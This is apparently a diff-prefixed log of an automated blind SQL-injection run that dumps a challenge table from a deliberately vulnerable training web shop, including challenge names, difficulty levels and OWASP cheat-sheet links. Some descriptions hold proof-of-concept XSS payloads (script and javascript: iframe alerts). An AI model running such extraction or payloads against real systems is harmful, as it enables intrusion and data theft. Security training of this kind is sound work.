+[11:57:26] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:26] [INFO] retrieving the length of query output
+
+[11:57:26] [INFO] retrieved: 25
+[11:57:27] [INFO] retrieved: _________________________
+[11:57:27] [INFO] retrieved:
+[11:57:29] [INFO] retrieved: Improper Input Validation
+[11:57:29] [INFO] retrieved: Improper Input Validation
+[11:57:29] [INFO] retrieving the length of query output
+
+[11:57:29] [INFO] retrieved: 1
+
+[11:57:29] [INFO] retrieved: 0
+[11:57:30] [INFO] retrieving the length of query output
+
+[11:57:30] [INFO] retrieved: 30
+[11:57:30] [INFO] retrieved: ______________________________
+[11:57:30] [INFO] retrieved:
+[11:57:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:33] [INFO] retrieving the length of query output
+
+[11:57:33] [INFO] retrieved: 60
+[11:57:33] [INFO] retrieved: __________________________________
+[11:57:33] [INFO] retrieved:
+[11:57:43] [INFO] retrieved: ..athering BEEs from the bee haven.
+[11:57:43] [INFO] retrieved: Mint the Honey Pot NFT by gathering BEEs from the bee haven.
+[11:57:43] [INFO] retrieving the length of query output
+
+[11:57:43] [INFO] retrieved: 1
+
+[11:57:43] [INFO] retrieved: 3
+[11:57:43] [INFO] retrieving the length of query output
+
+[11:57:43] [INFO] retrieved:
+
+[11:57:43] [INFO] retrieved:
+[11:57:44] [INFO] retrieving the length of query output
+
+[11:57:44] [INFO] retrieved: 1
+
+[11:57:44] [INFO] retrieved: 1
+[11:57:44] [INFO] retrieving the length of query output
+
+[11:57:44] [INFO] retrieved: 1
+
+[11:57:44] [INFO] retrieved: 9
+[11:57:44] [INFO] retrieving the length of query output
+
+[11:57:44] [INFO] retrieved: 16
+[11:57:44] [INFO] retrieved: ________________
+[11:57:44] [INFO] retrieved:
+[11:57:46] [INFO] retrieved: nftMintChallenge
+[11:57:46] [INFO] retrieved: nftMintChallenge
+[11:57:46] [INFO] retrieving the length of query output
+
+[11:57:46] [INFO] retrieved:
+
+[11:57:46] [INFO] retrieved:
+[11:57:46] [INFO] retrieving the length of query output
+
+[11:57:46] [INFO] retrieved: 18
+[11:57:47] [INFO] retrieved: __________________
+[11:57:47] [INFO] retrieved:
+[11:57:49] [INFO] retrieved: Mint the Honey Pot
+[11:57:49] [INFO] retrieved: Mint the Honey Pot
+[11:57:49] [INFO] retrieving the length of query output
+
+[11:57:49] [INFO] retrieved: 1
+
+[11:57:49] [INFO] retrieved: 0
+[11:57:49] [INFO] retrieving the length of query output
+
+[11:57:49] [INFO] retrieved: 43
+[11:57:49] [INFO] retrieved: __________________________________
+[11:57:49] [INFO] retrieved:
+[11:57:54] [INFO] retrieved: ..net Traffic,With Coding Challenge
+[11:57:54] [INFO] retrieved: Web3,Internet Traffic,With Coding Challenge
+[11:57:54] [INFO] retrieving the length of query output
+
+[11:57:54] [INFO] retrieved:
+
+[11:57:54] [INFO] retrieved:
+[11:57:54] [INFO] retrieving the length of query output
+
+[11:57:54] [INFO] retrieved: 30
+[11:57:55] [INFO] retrieved: ______________________________
+[11:57:55] [INFO] retrieved:
+[11:57:58] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:58] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:57:58] [INFO] retrieving the length of query output
+
+[11:57:58] [INFO] retrieved: 13
+[11:57:58] [INFO] retrieved: _____________
+[11:57:58] [INFO] retrieved:
+[11:58:00] [INFO] retrieved: Miscellaneous
+[11:58:00] [INFO] retrieved: Miscellaneous
+[11:58:00] [INFO] retrieving the length of query output
+
+[11:58:00] [INFO] retrieved: 1
+
+[11:58:00] [INFO] retrieved: 0
+[11:58:00] [INFO] retrieving the length of query output
+
+[11:58:00] [INFO] retrieved: 30
+[11:58:00] [INFO] retrieved: ______________________________
+[11:58:00] [INFO] retrieved:
+[11:58:03] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:03] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:03] [INFO] retrieving the length of query output
+
+[11:58:03] [INFO] retrieved: 57
+[11:58:04] [INFO] retrieved: __________________________________
+[11:58:04] [INFO] retrieved:
+[11:58:10] [INFO] retrieved: ..he new wallet than you deposited.
+[11:58:10] [INFO] retrieved: Withdraw more ETH from the new wallet than you deposited.
+[11:58:10] [INFO] retrieving the length of query output
+
+[11:58:10] [INFO] retrieved: 1
+
+[11:58:10] [INFO] retrieved: 6
+[11:58:10] [INFO] retrieving the length of query output
+
+[11:58:10] [INFO] retrieved:
+
+[11:58:10] [INFO] retrieved:
+[11:58:10] [INFO] retrieving the length of query output
+
+[11:58:10] [INFO] retrieved: 1
+
+[11:58:10] [INFO] retrieved: 1
+[11:58:10] [INFO] retrieving the length of query output
+
+[11:58:10] [INFO] retrieved: 2
+[11:58:10] [INFO] retrieved: __
+[11:58:10] [INFO] retrieved:
+[11:58:11] [INFO] retrieved: 10
+[11:58:11] [INFO] retrieved: 10
+[11:58:11] [INFO] retrieving the length of query output
+
+[11:58:11] [INFO] retrieved: 19
+[11:58:11] [INFO] retrieved: ___________________
+[11:58:11] [INFO] retrieved:
+[11:58:17] [INFO] retrieved: web3WalletChallenge
+[11:58:17] [INFO] retrieved: web3WalletChallenge
+[11:58:17] [INFO] retrieving the length of query output
+
+[11:58:17] [INFO] retrieved:
+
+[11:58:17] [INFO] retrieved:
+[11:58:17] [INFO] retrieving the length of query output
+
+[11:58:17] [INFO] retrieved: 16
+[11:58:17] [INFO] retrieved: ________________
+[11:58:17] [INFO] retrieved:
+[11:58:19] [INFO] retrieved: Wallet Depletion
+[11:58:19] [INFO] retrieved: Wallet Depletion
+[11:58:19] [INFO] retrieving the length of query output
+
+[11:58:19] [INFO] retrieved: 1
+
+[11:58:19] [INFO] retrieved: 0
+[11:58:19] [INFO] retrieving the length of query output
+
+[11:58:19] [INFO] retrieved: 43
+[11:58:19] [INFO] retrieved: __________________________________
+[11:58:19] [INFO] retrieved:
+[11:58:24] [INFO] retrieved: ..net Traffic,With Coding Challenge
+[11:58:24] [INFO] retrieved: Web3,Internet Traffic,With Coding Challenge
+[11:58:24] [INFO] retrieving the length of query output
+
+[11:58:24] [INFO] retrieved:
+
+[11:58:24] [INFO] retrieved:
+[11:58:24] [INFO] retrieving the length of query output
+
+[11:58:24] [INFO] retrieved: 30
+[11:58:24] [INFO] retrieved: ______________________________
+[11:58:24] [INFO] retrieved:
+[11:58:27] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:27] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:27] [INFO] retrieving the length of query output
+
+[11:58:27] [INFO] retrieved: 21
+[11:58:28] [INFO] retrieved: _____________________
+[11:58:28] [INFO] retrieved:
+[11:58:30] [INFO] retrieved: Broken Access Control
+[11:58:30] [INFO] retrieved: Broken Access Control
+[11:58:30] [INFO] retrieving the length of query output
+
+[11:58:30] [INFO] retrieved: 1
+
+[11:58:30] [INFO] retrieved: 0
+[11:58:30] [INFO] retrieving the length of query output
+
+[11:58:30] [INFO] retrieved: 30
+[11:58:30] [INFO] retrieved: ______________________________
+[11:58:30] [INFO] retrieved:
+[11:58:33] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:34] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:34] [INFO] retrieving the length of query output
+
+[11:58:34] [INFO] retrieved: 82
+[11:58:34] [INFO] retrieved: __________________________________
+[11:58:34] [INFO] retrieved:
+[11:58:42] [INFO] retrieved: ..iting smart contracts on the fly.
+[11:58:42] [INFO] retrieved: Find an accidentally deployed code sandbox for writing smart contracts on the fly.
+[11:58:42] [INFO] retrieving the length of query output
+
+[11:58:42] [INFO] retrieved: 1
+
+[11:58:42] [INFO] retrieved: 1
+[11:58:42] [INFO] retrieving the length of query output
+
+[11:58:42] [INFO] retrieved:
+
+[11:58:42] [INFO] retrieved:
+[11:58:43] [INFO] retrieving the length of query output
+
+[11:58:43] [INFO] retrieved: 1
+
+[11:58:43] [INFO] retrieved: 1
+[11:58:43] [INFO] retrieving the length of query output
+
+[11:58:43] [INFO] retrieved: 2
+[11:58:43] [INFO] retrieved: __
+[11:58:43] [INFO] retrieved:
+[11:58:43] [INFO] retrieved: 11
+[11:58:43] [INFO] retrieved: 11
+[11:58:43] [INFO] retrieving the length of query output
+
+[11:58:43] [INFO] retrieved: 20
+[11:58:43] [INFO] retrieved: ____________________
+[11:58:43] [INFO] retrieved:
+[11:58:46] [INFO] retrieved: web3SandboxChallenge
+[11:58:46] [INFO] retrieved: web3SandboxChallenge
+[11:58:46] [INFO] retrieving the length of query output
+
+[11:58:46] [INFO] retrieved:
+
+[11:58:46] [INFO] retrieved:
+[11:58:46] [INFO] retrieving the length of query output
+
+[11:58:46] [INFO] retrieved: 12
+[11:58:46] [INFO] retrieved: ____________
+[11:58:46] [INFO] retrieved:
+[11:58:48] [INFO] retrieved: Web3 Sandbox
+[11:58:48] [INFO] retrieved: Web3 Sandbox
+[11:58:48] [INFO] retrieving the length of query output
+
+[11:58:48] [INFO] retrieved: 1
+
+[11:58:48] [INFO] retrieved: 0
+[11:58:51] [INFO] retrieving the length of query output
+
+[11:58:51] [INFO] retrieved: 26
+[11:58:51] [INFO] retrieved: __________________________
+[11:58:51] [INFO] retrieved:
+[11:58:54] [INFO] retrieved: Web3,With Coding Challenge
+[11:58:54] [INFO] retrieved: Web3,With Coding Challenge
+[11:58:54] [INFO] retrieving the length of query output
+
+[11:58:54] [INFO] retrieved:
+
+[11:58:54] [INFO] retrieved:
+[11:58:54] [INFO] retrieving the length of query output
+
+[11:58:54] [INFO] retrieved: 30
+[11:58:54] [INFO] retrieved: ______________________________
+[11:58:54] [INFO] retrieved:
+[11:58:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:58:57] [INFO] retrieving the length of query output
+
+[11:58:57] [INFO] retrieved: 24
+[11:58:58] [INFO] retrieved: ________________________
+[11:58:58] [INFO] retrieved:
+[11:59:00] [INFO] retrieved: Insecure Deserialization
+[11:59:00] [INFO] retrieved: Insecure Deserialization
+[11:59:00] [INFO] retrieving the length of query output
+
+[11:59:00] [INFO] retrieved: 1
+
+[11:59:00] [INFO] retrieved: 0
+[11:59:00] [INFO] retrieving the length of query output
+
+[11:59:00] [INFO] retrieved: 30
+[11:59:00] [INFO] retrieved: ______________________________
+[11:59:00] [INFO] retrieved:
+[11:59:04] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:04] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:04] [INFO] retrieving the length of query output
+
+[11:59:04] [INFO] retrieved: 175
+[11:59:04] [INFO] retrieved: __________________________________
+[11:59:04] [INFO] retrieved:
+[11:59:23] [INFO] retrieved: ..harmful on Docker!)
+[11:59:23] [INFO] retrieved: Perform a Remote Code Execution that would keep a less hardened application busy forever. (This challenge is potentially harmful on Docker!)
+[11:59:23] [INFO] retrieving the length of query output
+
+[11:59:23] [INFO] retrieved: 1
+
+[11:59:23] [INFO] retrieved: 5
+[11:59:23] [INFO] retrieving the length of query output
+
+[11:59:23] [INFO] retrieved: 6
+[11:59:26] [INFO] retrieved: ______
+[11:59:26] [INFO] retrieved:
+[11:59:27] [INFO] retrieved: Docker
+[11:59:27] [INFO] retrieved: Docker
+[11:59:27] [INFO] retrieving the length of query output
+
+[11:59:27] [INFO] retrieved: 1
+
+[11:59:27] [INFO] retrieved: 0
+[11:59:27] [INFO] retrieving the length of query output
+
+[11:59:27] [INFO] retrieved: 2
+[11:59:27] [INFO] retrieved: __
+[11:59:27] [INFO] retrieved:
+[11:59:27] [INFO] retrieved: 12
+[11:59:27] [INFO] retrieved: 12
+[11:59:27] [INFO] retrieving the length of query output
+
+[11:59:27] [INFO] retrieved: 12
+[11:59:28] [INFO] retrieved: ____________
+[11:59:28] [INFO] retrieved:
+[11:59:29] [INFO] retrieved: rceChallenge
+[11:59:29] [INFO] retrieved: rceChallenge
+[11:59:29] [INFO] retrieving the length of query output
+
+[11:59:29] [INFO] retrieved: 81
+[11:59:29] [INFO] retrieved: __________________________________
+[11:59:29] [INFO] retrieved:
+[11:59:37] [INFO] retrieved: ..enial_of_Service_Cheat_Sheet.html
+[11:59:37] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html
+[11:59:37] [INFO] retrieving the length of query output
+
+[11:59:37] [INFO] retrieved: 15
+[11:59:37] [INFO] retrieved: _______________
+[11:59:37] [INFO] retrieved:
+[11:59:39] [INFO] retrieved: Blocked RCE DoS
+[11:59:39] [INFO] retrieved: Blocked RCE DoS
+[11:59:39] [INFO] retrieving the length of query output
+
+[11:59:39] [INFO] retrieved: 1
+
+[11:59:39] [INFO] retrieved: 0
+[11:59:39] [INFO] retrieving the length of query output
+
+[11:59:39] [INFO] retrieved: 11
+[11:59:39] [INFO] retrieved: ___________
+[11:59:39] [INFO] retrieved:
+[11:59:41] [INFO] retrieved: Danger Zone
+[11:59:41] [INFO] retrieved: Danger Zone
+[11:59:41] [INFO] retrieving the length of query output
+
+[11:59:41] [INFO] retrieved:
+
+[11:59:41] [INFO] retrieved:
+[11:59:41] [INFO] retrieving the length of query output
+
+[11:59:41] [INFO] retrieved: 30
+[11:59:41] [INFO] retrieved: ______________________________
+[11:59:41] [INFO] retrieved:
+[11:59:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:45] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:45] [INFO] retrieving the length of query output
+
+[11:59:45] [INFO] retrieved: 22
+[11:59:45] [INFO] retrieved: ______________________
+[11:59:45] [INFO] retrieved:
+[11:59:47] [INFO] retrieved: Broken Anti Automation
+[11:59:47] [INFO] retrieved: Broken Anti Automation
+[11:59:47] [INFO] retrieving the length of query output
+
+[11:59:47] [INFO] retrieved: 1
+
+[11:59:47] [INFO] retrieved: 0
+[11:59:48] [INFO] retrieving the length of query output
+
+[11:59:48] [INFO] retrieved: 30
+[11:59:48] [INFO] retrieved: ______________________________
+[11:59:48] [INFO] retrieved:
+[11:59:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:51] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[11:59:51] [INFO] retrieving the length of query output
+
+[11:59:51] [INFO] retrieved: 55
+[11:59:51] [INFO] retrieved: __________________________________
+[11:59:51] [INFO] retrieved:
+[11:59:57] [INFO] retrieved: ..omer feedbacks within 20 seconds.
+[11:59:57] [INFO] retrieved: Submit 10 or more customer feedbacks within 20 seconds.
+[11:59:57] [INFO] retrieving the length of query output
+
+[11:59:57] [INFO] retrieved: 1
+
+[11:59:57] [INFO] retrieved: 3
+[11:59:57] [INFO] retrieving the length of query output
+
+[11:59:57] [INFO] retrieved:
+
+[11:59:57] [INFO] retrieved:
+[11:59:57] [INFO] retrieving the length of query output
+
+[11:59:57] [INFO] retrieved: 1
+
+[11:59:57] [INFO] retrieved: 0
+[11:59:58] [INFO] retrieving the length of query output
+
+[11:59:58] [INFO] retrieved: 2
+[11:59:58] [INFO] retrieved: __
+[11:59:58] [INFO] retrieved:
+[11:59:58] [INFO] retrieved: 13
+[11:59:58] [INFO] retrieved: 13
+[11:59:58] [INFO] retrieving the length of query output
+
+[11:59:58] [INFO] retrieved: 22
+[11:59:58] [INFO] retrieved: ______________________
+[11:59:58] [INFO] retrieved:
+[12:00:01] [INFO] retrieved: captchaBypassChallenge
+[12:00:01] [INFO] retrieved: captchaBypassChallenge
+[12:00:01] [INFO] retrieving the length of query output
+
+[12:00:01] [INFO] retrieved:
+
+[12:00:01] [INFO] retrieved:
+[12:00:01] [INFO] retrieving the length of query output
+
+[12:00:01] [INFO] retrieved: 14
+[12:00:01] [INFO] retrieved: ______________
+[12:00:01] [INFO] retrieved:
+[12:00:03] [INFO] retrieved: CAPTCHA Bypass
+[12:00:03] [INFO] retrieved: CAPTCHA Bypass
+[12:00:03] [INFO] retrieving the length of query output
+
+[12:00:03] [INFO] retrieved: 1
+
+[12:00:03] [INFO] retrieved: 0
+[12:00:03] [INFO] retrieving the length of query output
+
+[12:00:03] [INFO] retrieved: 11
+[12:00:03] [INFO] retrieved: ___________
+[12:00:03] [INFO] retrieved:
+[12:00:04] [INFO] retrieved: Brute Force
+[12:00:04] [INFO] retrieved: Brute Force
+[12:00:04] [INFO] retrieving the length of query output
+
+[12:00:04] [INFO] retrieved:
+
+[12:00:04] [INFO] retrieved:
+[12:00:04] [INFO] retrieving the length of query output
+
+[12:00:04] [INFO] retrieved: 30
+[12:00:05] [INFO] retrieved: ______________________________
+[12:00:05] [INFO] retrieved:
+[12:00:08] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:08] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:08] [INFO] retrieving the length of query output
+
+[12:00:08] [INFO] retrieved: 21
+[12:00:08] [INFO] retrieved: _____________________
+[12:00:08] [INFO] retrieved:
+[12:00:11] [INFO] retrieved: Broken Authentication
+[12:00:11] [INFO] retrieved: Broken Authentication
+[12:00:11] [INFO] retrieving the length of query output
+
+[12:00:11] [INFO] retrieved: 1
+
+[12:00:11] [INFO] retrieved: 0
+[12:00:11] [INFO] retrieving the length of query output
+
+[12:00:11] [INFO] retrieved: 30
+[12:00:11] [INFO] retrieved: ______________________________
+[12:00:11] [INFO] retrieved:
+[12:00:19] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:19] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:19] [INFO] retrieving the length of query output
+
+[12:00:19] [INFO] retrieved: 97
+[12:00:19] [INFO] retrieved: __________________________________
+[12:00:19] [INFO] retrieved:
+[12:00:29] [INFO] retrieved: ..SQL Injection or Forgot Password.
+[12:00:29] [INFO] retrieved: Change Bender's password into slurmCl4ssic without using SQL Injection or Forgot Password.
+[12:00:29] [INFO] retrieving the length of query output
+
+[12:00:29] [INFO] retrieved: 1
+
+[12:00:29] [INFO] retrieved: 5
+[12:00:30] [INFO] retrieving the length of query output
+
+[12:00:30] [INFO] retrieved:
+
+[12:00:30] [INFO] retrieved:
+[12:00:30] [INFO] retrieving the length of query output
+
+[12:00:30] [INFO] retrieved: 1
+
+[12:00:30] [INFO] retrieved: 0
+[12:00:30] [INFO] retrieving the length of query output
+
+[12:00:30] [INFO] retrieved: 2
+[12:00:30] [INFO] retrieved: __
+[12:00:30] [INFO] retrieved:
+[12:00:30] [INFO] retrieved: 14
+[12:00:30] [INFO] retrieved: 14
+[12:00:31] [INFO] retrieving the length of query output
+
+[12:00:30] [INFO] retrieved: 29
+[12:00:31] [INFO] retrieved: _____________________________
+[12:00:31] [INFO] retrieved:
+[12:00:34] [INFO] retrieved: changePasswordBenderChallenge
+[12:00:34] [INFO] retrieved: changePasswordBenderChallenge
+[12:00:34] [INFO] retrieving the length of query output
+
+[12:00:34] [INFO] retrieved: 78
+[12:00:34] [INFO] retrieved: __________________________________
+[12:00:34] [INFO] retrieved:
+[12:00:42] [INFO] retrieved: ..s/Authentication_Cheat_Sheet.html
+[12:00:42] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
+[12:00:42] [INFO] retrieving the length of query output
+
+[12:00:42] [INFO] retrieved: 24
+[12:00:42] [INFO] retrieved: ________________________
+[12:00:42] [INFO] retrieved:
+[12:00:44] [INFO] retrieved: Change Bender's Password
+[12:00:44] [INFO] retrieved: Change Bender's Password
+[12:00:44] [INFO] retrieving the length of query output
+
+[12:00:44] [INFO] retrieved: 1
+
+[12:00:45] [INFO] retrieved: 0
+[12:00:45] [INFO] retrieving the length of query output
+
+[12:00:45] [INFO] retrieved:
+
+[12:00:45] [INFO] retrieved:
+[12:00:45] [INFO] retrieving the length of query output
+
+[12:00:45] [INFO] retrieved:
+
+[12:00:45] [INFO] retrieved:
+[12:00:45] [INFO] retrieving the length of query output
+
+[12:00:45] [INFO] retrieved: 30
+[12:00:45] [INFO] retrieved: ______________________________
+[12:00:45] [INFO] retrieved:
+[12:00:49] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:49] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:49] [INFO] retrieving the length of query output
+
+[12:00:49] [INFO] retrieved: 9
+[12:00:49] [INFO] retrieved: _________
+[12:00:49] [INFO] retrieved:
+[12:00:50] [INFO] retrieved: Injection
+[12:00:50] [INFO] retrieved: Injection
+[12:00:50] [INFO] retrieving the length of query output
+
+[12:00:50] [INFO] retrieved: 1
+
+[12:00:53] [INFO] retrieved: 0
+[12:00:53] [INFO] retrieving the length of query output
+
+[12:00:53] [INFO] retrieved: 30
+[12:00:53] [INFO] retrieved: ______________________________
+[12:00:53] [INFO] retrieved:
+[12:00:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:57] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:00:57] [INFO] retrieving the length of query output
+
+[12:00:57] [INFO] retrieved: 42
+[12:00:57] [INFO] retrieved: __________________________________
+[12:00:57] [INFO] retrieved:
+[12:01:01] [INFO] retrieved: .. Christmas special offer of 2014.
+[12:01:01] [INFO] retrieved: Order the Christmas special offer of 2014.
+[12:01:01] [INFO] retrieving the length of query output
+
+[12:01:01] [INFO] retrieved: 1
+
+[12:01:01] [INFO] retrieved: 4
+[12:01:01] [INFO] retrieving the length of query output
+
+[12:01:01] [INFO] retrieved:
+
+[12:01:02] [INFO] retrieved:
+[12:01:02] [INFO] retrieving the length of query output
+
+[12:01:02] [INFO] retrieved: 1
+
+[12:01:02] [INFO] retrieved: 0
+[12:01:02] [INFO] retrieving the length of query output
+
+[12:01:02] [INFO] retrieved: 2
+[12:01:02] [INFO] retrieved: __
+[12:01:02] [INFO] retrieved:
+[12:01:02] [INFO] retrieved: 15
+[12:01:02] [INFO] retrieved: 15
+[12:01:02] [INFO] retrieving the length of query output
+
+[12:01:02] [INFO] retrieved: 25
+[12:01:03] [INFO] retrieved: _________________________
+[12:01:03] [INFO] retrieved:
+[12:01:05] [INFO] retrieved: christmasSpecialChallenge
+[12:01:05] [INFO] retrieved: christmasSpecialChallenge
+[12:01:05] [INFO] retrieving the length of query output
+
+[12:01:05] [INFO] retrieved: 88
+[12:01:05] [INFO] retrieved: __________________________________
+[12:01:05] [INFO] retrieved:
+[12:01:15] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html
+[12:01:15] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
+[12:01:15] [INFO] retrieving the length of query output
+
+[12:01:15] [INFO] retrieved: 17
+[12:01:15] [INFO] retrieved: _________________
+[12:01:15] [INFO] retrieved:
+[12:01:17] [INFO] retrieved: Christmas Special
+[12:01:17] [INFO] retrieved: Christmas Special
+[12:01:17] [INFO] retrieving the length of query output
+
+[12:01:17] [INFO] retrieved: 1
+
+[12:01:17] [INFO] retrieved: 0
+[12:01:17] [INFO] retrieving the length of query output
+
+[12:01:17] [INFO] retrieved:
+
+[12:01:17] [INFO] retrieved:
+[12:01:17] [INFO] retrieving the length of query output
+
+[12:01:17] [INFO] retrieved:
+
+[12:01:17] [INFO] retrieved:
+[12:01:18] [INFO] retrieving the length of query output
+
+[12:01:18] [INFO] retrieved: 30
+[12:01:18] [INFO] retrieved: ______________________________
+[12:01:18] [INFO] retrieved:
+[12:01:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:01:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:01:21] [INFO] retrieving the length of query output
+
+[12:01:21] [INFO] retrieved: 3
+[12:01:21] [INFO] retrieved: ___
+[12:01:21] [INFO] retrieved:
+[12:01:21] [INFO] retrieved: XSS
+[12:01:22] [INFO] retrieved: XSS
+[12:01:22] [INFO] retrieving the length of query output
+
+[12:01:22] [INFO] retrieved: 1
+
+[12:01:22] [INFO] retrieved: 0
+[12:01:22] [INFO] retrieving the length of query output
+
+[12:01:22] [INFO] retrieved: 30
+[12:01:22] [INFO] retrieved: ______________________________
+[12:01:22] [INFO] retrieved:
+[12:01:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:01:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:01:28] [INFO] retrieving the length of query output
+
+[12:01:28] [INFO] retrieved: 238
+[12:01:28] [INFO] retrieved: __________________________________
+[12:01:28] [INFO] retrieved:
+[12:01:53] [INFO] retrieved: ..harmful on Docker!)
+[12:01:53] [INFO] retrieved: Bypass the Content Security Policy and perform an XSS attack with <script>alert(`xss`)</script> on a legacy page within the application. (This challenge is potentially harmful on Docker!)
+[12:01:53] [INFO] retrieving the length of query output
+
+[12:01:53] [INFO] retrieved: 1
+
+[12:01:53] [INFO] retrieved: 4
+[12:01:53] [INFO] retrieving the length of query output
+
+[12:01:53] [INFO] retrieved: 6
+[12:01:53] [INFO] retrieved: ______
+[12:01:53] [INFO] retrieved:
+[12:01:54] [INFO] retrieved: Docker
+[12:01:54] [INFO] retrieved: Docker
+[12:01:54] [INFO] retrieving the length of query output
+
+[12:01:54] [INFO] retrieved: 1
+
+[12:01:54] [INFO] retrieved: 0
+[12:01:54] [INFO] retrieving the length of query output
+
+[12:01:54] [INFO] retrieved: 2
+[12:01:54] [INFO] retrieved: __
+[12:01:54] [INFO] retrieved:
+[12:01:54] [INFO] retrieved: 16
+[12:01:54] [INFO] retrieved: 16
+[12:01:55] [INFO] retrieving the length of query output
+
+[12:01:54] [INFO] retrieved: 20
+[12:01:55] [INFO] retrieved: ____________________
+[12:01:55] [INFO] retrieved:
+[12:01:57] [INFO] retrieved: usernameXssChallenge
+[12:01:57] [INFO] retrieved: usernameXssChallenge
+[12:01:57] [INFO] retrieving the length of query output
+
+[12:01:57] [INFO] retrieved: 95
+[12:01:57] [INFO] retrieved: __________________________________
+[12:01:57] [INFO] retrieved:
+[12:02:09] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html
+[12:02:09] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
+[12:02:09] [INFO] retrieving the length of query output
+
+[12:02:09] [INFO] retrieved: 10
+[12:02:09] [INFO] retrieved: __________
+[12:02:09] [INFO] retrieved:
+[12:02:11] [INFO] retrieved: CSP Bypass
+[12:02:11] [INFO] retrieved: CSP Bypass
+[12:02:11] [INFO] retrieving the length of query output
+
+[12:02:11] [INFO] retrieved: 1
+
+[12:02:11] [INFO] retrieved: 0
+[12:02:11] [INFO] retrieving the length of query output
+
+[12:02:11] [INFO] retrieved: 11
+[12:02:11] [INFO] retrieved: ___________
+[12:02:11] [INFO] retrieved:
+[12:02:12] [INFO] retrieved: Danger Zone
+[12:02:12] [INFO] retrieved: Danger Zone
+[12:02:12] [INFO] retrieving the length of query output
+
+[12:02:12] [INFO] retrieved:
+
+[12:02:12] [INFO] retrieved:
+[12:02:12] [INFO] retrieving the length of query output
+
+[12:02:12] [INFO] retrieved: 30
+[12:02:13] [INFO] retrieved: ______________________________
+[12:02:13] [INFO] retrieved:
+[12:02:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:02:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:02:16] [INFO] retrieving the length of query output
+
+[12:02:16] [INFO] retrieved: 3
+[12:02:17] [INFO] retrieved: ___
+[12:02:17] [INFO] retrieved:
+[12:02:17] [INFO] retrieved: XSS
+[12:02:17] [INFO] retrieved: XSS
+[12:02:17] [INFO] retrieving the length of query output
+
+[12:02:17] [INFO] retrieved: 1
+
+[12:02:17] [INFO] retrieved: 0
+[12:02:17] [INFO] retrieving the length of query output
+
+[12:02:17] [INFO] retrieved: 30
+[12:02:17] [INFO] retrieved: ______________________________
+[12:02:17] [INFO] retrieved:
+[12:02:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:02:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:02:21] [INFO] retrieving the length of query output
+
+[12:02:21] [INFO] retrieved: 228
+[12:02:21] [INFO] retrieved: __________________________________
+[12:02:21] [INFO] retrieved:
+[12:02:48] [INFO] retrieved: ..harmful on Docker!)
+[12:02:48] [INFO] retrieved: Perform a persisted XSS attack with <iframe src="javascript:alert(`xss`)"> bypassing a client-side security mechanism. (This challenge is potentially harmful on Docker!)
+[12:02:48] [INFO] retrieving the length of query output
+
+[12:02:48] [INFO] retrieved: 1
+
+[12:02:48] [INFO] retrieved: 3
+[12:02:48] [INFO] retrieving the length of query output
+
+[12:02:48] [INFO] retrieved: 6
+[12:02:48] [INFO] retrieved: ______
+[12:02:48] [INFO] retrieved:
+[12:02:49] [INFO] retrieved: Docker
+[12:02:49] [INFO] retrieved: Docker
+[12:02:49] [INFO] retrieving the length of query output
+
+[12:02:49] [INFO] retrieved: 1
+
+[12:02:49] [INFO] retrieved: 0
+[12:02:49] [INFO] retrieving the length of query output
+
+[12:02:49] [INFO] retrieved: 2
+[12:02:49] [INFO] retrieved: __
+[12:02:49] [INFO] retrieved:
+[12:02:49] [INFO] retrieved: 17
+[12:02:50] [INFO] retrieved: 17
+[12:02:50] [INFO] retrieving the length of query output
+
+[12:02:50] [INFO] retrieved: 25
+[12:02:50] [INFO] retrieved: _________________________
+[12:02:50] [INFO] retrieved:
+[12:02:52] [INFO] retrieved: persistedXssUserChallenge
+[12:02:52] [INFO] retrieved: persistedXssUserChallenge
